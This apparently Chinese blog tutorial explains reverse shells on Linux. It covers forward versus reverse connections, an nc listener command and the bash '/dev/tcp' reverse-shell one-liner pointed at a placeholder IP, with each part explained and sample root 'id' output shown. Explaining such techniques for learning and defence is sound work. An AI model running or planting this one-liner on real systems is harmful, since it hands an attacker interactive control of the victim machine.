首页 > 系统相关 >反弹shell

反弹shell

时间:2024-09-07 09:36:02浏览次数:7  
标签:shell 主机 xxx 端口 攻击者 反弹 连接

反弹shell

Linux系统环境

什么是反弹shell

反弹Shell是一种网络攻击技术,用于通过远程主机上的Shell(命令行终端)与攻击者建立连接,从而控制受攻击主机。攻击者通常在受攻击主机上以各种方式植入恶意代码(如后门程序),然后通过网络与该主机上运行的Shell建立反向连接,从而获得对该主机的完全控制权。

攻击者监听端口(TCP/UDP),被攻击端发送请求到该端口,并且 被控端的命令行的 输入输出 也被转到控制端

也就是 控制其他主机 能够实现输入输出命令

正向连接

攻击者打开其他主机的端口,此时攻击者从自己的机器去连接目标机器叫做正向连接

反向连接

是被控主机反向去连接攻击的主机的过程

(反向连接可以突破防火墙屏蔽及权限不足的的限制)

什么时候用反弹shell

当被控端 防火墙受限,权限不足,端口被占登情况 导致攻击者无法对被控端进行直接控制

反弹类型

bash命令反弹shell,nc反弹shell,python反弹shell

服务端

nc命令开启监听端口

nc -lvp 8080	#在本地监听8080端口 等待来自远程主机的链接请求

客户端

通过某种手段 使被控端 执行以下的命令

bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1

交互式运行bash shell命令,重定向到IP地址为xxx.xxx.xxx.xxx的计算机上的端口8080

/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/

bash -i 参数表示以交互式方式运行Bash Shell并加载当前目录下的bashrc文件(如果存在)

>& /dev/tcp/xx.xx.xx.xx/4578 重定向了输出和错误输出到远程计算机的端口8080

0>&1 输入重定向到输出,实现与反弹shell的交互

结果

当客户端执行命令后服务端会有反显,后就可以执行shell命令了,执行id命令返回结果

# id
uid=0(root) gid=0(root) groups=0(root)

标签:shell,主机,xxx,端口,攻击者,反弹,连接
From: https://www.cnblogs.com/Yolololo/p/18401345

相关文章

  • 【shell脚本】使用firewall-cmd批量增加IP访问规则
    原创wsdhla想惑1025增加单个IP,并指定端口:firewall-cmd--permanent--zone=public--add-rich-rule="rulefamily="ipv4"sourceaddress="xxx.xx.xx.xxx"portprotocol="tcp"port="54321"accept"批量增加IP访问规则,使用脚本:batch-ad......
  • Shell编程撰写Linux工具箱
    创建一个Linux工具箱脚本可以帮助您快速执行常见的系统管理任务。以下是一个示例脚本,包含了一些常见的功能,如系统信息查看、磁盘使用情况检查、网络信息查看、进程管理等。前言在开发者的世界里,我们不断探索,不断创新。今天,我们携手赞助商浪浪云,向您致敬,同时以敬业的精神......
  • jekins--- 通过jekins执行远程机器的shell脚本
    jekins和脚本部署的不是在同一个机器,简单的来说说如何用jekins通过SSH连接执行远程机器的shell脚本1:简单的看一下脚本的内容,自己写的一个简单的测试脚本,执行了就会打印一个脚本已执行成功在日志中#!/bin/bash#日志文件路径LOG_FILE="/dongguangshu/logfile.log"#要打印......
  • shell脚本编写之函数
    shell中的函数定义比较简单,定义函数名可以没有类型,函数返回值可有可无,如果有返回值,必须返回整数n(0~255)。同时,函数的定义必须放在shell脚本的开头部分,只有函数被shell解释器发现后,才能发调用。定义语法如下:1、不带参数举例执行结果如下:2、带参数示例执行结果如下:......
  • 0906 shell编程与基础算法(leetCode)
    哈希表的基本知识:哈希表(HashTable)又称散列表,是除顺序存储结构、链式存储结构和索引表存储结构之外的又一种存储结构。哈希碰撞:解决办法开放定址法:是一类以发生冲突的哈希地址为自变量,通过某种哈希冲突函数得到一个新的空闲的哈希地址的方法。(1)线性探测法从发生冲突的地......
  • 三、搭建网站服务器超详细步骤——FinalShell下载安装使用流程(免费国产的SSH工具)+宝塔
    前言本篇博客是搭建网站服务器模块下的第3部分  FinalShell下载安装使用流程  在分享这篇博客之前,首先讲一下,FinalShell软件是干什么用的,用大白话进行说明一下:这个软件是一款远程控制和管理服务器的软件,通过SSH协议与远程服务器进行连接,去操控一系列的命令信息。就像......
  • 【工具推荐】TomcatWeakPassChecker v2.2(最新版本) - Tomcat 漏洞一键漏洞利用getshe
    工具介绍:一键tomcat漏洞批量弱口令检测、后台部署war包getshell,该脚本用于检查ApacheTomcat管理页面的弱密码,并尝试通过上传自定义WAR包部署GodzillaWebshell。如果成功,将记录成功登录的信息以及获取到的Webshell地址。下载地址链接:https://pan.quark.cn/s/2062b75c4312环......
  • Shell脚本
    User:解释一下shell脚本中${data##*/}Kimi:在Shell脚本中,${data##*/}是一个参数扩展(parameterexpansion)的表达式,用于从变量data的值中删除最长匹配的前缀模式。具体来说,${data##*/}的含义如下:data:这是要操作的变量名。##:这是一个双字符操作符,表示删除最长匹配的前......
  • Shell编程:文本处理器(cut、split、paste、eval 命令)
    文章目录文本处理器2cut命令-快速裁剪语法格式常用选项示例split命令-文件拆分语法格式常用选项示例paste命令-文件合并语法格式常用选项示例eval命令-变量扫描器工作原理示例文本处理器2本章讲解grep、sort、uniq、tr、cut、split、paste命令等。这......
  • Shell编程:文本处理器(grep、sort、uniq、tr 命令)
    文章目录文本处理器1grep命令-搜索文本语法格式常用选项示例sort命令-行排序语法格式常用选项示例uniq命令-快捷去重语法格式常用选项示例tr命令-字符替换删除语法格式常用选项参数示例文本处理器1本章讲解grep、sort、uniq、tr、cut、split、paste命......